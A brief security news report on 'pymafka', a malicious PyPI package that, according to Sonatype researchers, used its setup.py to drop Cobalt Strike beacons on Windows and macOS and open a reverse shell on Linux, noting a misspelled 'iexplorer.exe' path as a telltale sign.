Windows, macOS, and Linux systems have been targeted with supply chain attacks
by a new malicious Python package in PyPi that deploys backdoors and Cobalt Strike beacons, BleepingComputer
Since being uploaded to PyPi on Tuesday, the malicious package dubbed 'pymafka' has been downloaded 325 times before being removed from the open-source package repository. Despite limited downloads, significant damage is still expected from those that will be impacted due to the package's ability to enable initial access to the developer's internal network, according to a report from Sonatype. With the execution of the 'setup.py' script, devices' operating systems are being detected, with a compatible malicious payload then retrieved and executed. Detection of Windows and macOS machines will prompt pymafka to retrieve a Cobalt Strike beacon to facilitate remote device access, while identification of Linux systems will trigger a reverse shell.
"On Windows systems, the Python script attempts to drop the Cobalt Strike beacon at 'C:UsersPubliciexplorer.exe'. Note, this misspelling stands out as the legitimate Microsoft Internet Explorer process is typically called "iexplore.exe" (no 'r' at the end) and isn't present in the C:UsersPublic directory," wrote researcher Ax Sharma.